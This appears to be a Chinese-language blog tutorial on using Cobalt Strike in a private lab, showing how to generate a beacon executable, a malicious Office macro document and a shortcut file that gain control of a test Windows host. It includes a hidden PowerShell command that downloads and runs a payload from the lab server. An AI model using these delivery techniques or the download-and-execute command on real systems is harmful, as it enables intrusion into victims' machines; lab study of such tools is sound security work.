目录

  1. 1. 前言
  2. 2. 环境
  3. 3. Windows EXE
  4. 4.
  5. 5. 快捷方式上线

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

Cobalt Strike

2025/5/24
字数统计: 298字   |   阅读时长: 1分   |   总文章阅读量:

前言

环境

CS客户端:Windows 10 192.168.208.1

CS服务端:Kali 192.168.208.128

受害主机:Windows Server 2003 192.168.208.3

以 root 权限启动服务端

img

客户端连接

img

设置listener

img

Windows EXE

载入listener,生成32位beacon木马

img

将生成的 beacon 传入受害主机,然后在受害主机启动 beacon.exe

img

成功上线

在 beacon 命令行修改心跳时间为 1s

img

成功执行命令

同理可上传 artifact.exe,beacon 生成的是无进程的exe,把包含 payload 在内的全功能被控端都放入生成的可执行文件,即完整木马

载入listener,生成MS Office Macro

img

在word中打开宏,任意填写一个宏名称,宏的位置选择当前文档

创建后把原本的内容替换为 Copy Macro 的内容

img

关闭编辑器,另存文档为启用宏的文档,可以保存为docm或者doc

img

打开此文档后就会发现成功上线

img

快捷方式上线

使用 Web Drive-by 下的 script web delivery

img

启动得到payload:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.208.128:80/flag'))"

复制到 lnk 的目标中

img

点击后上线

img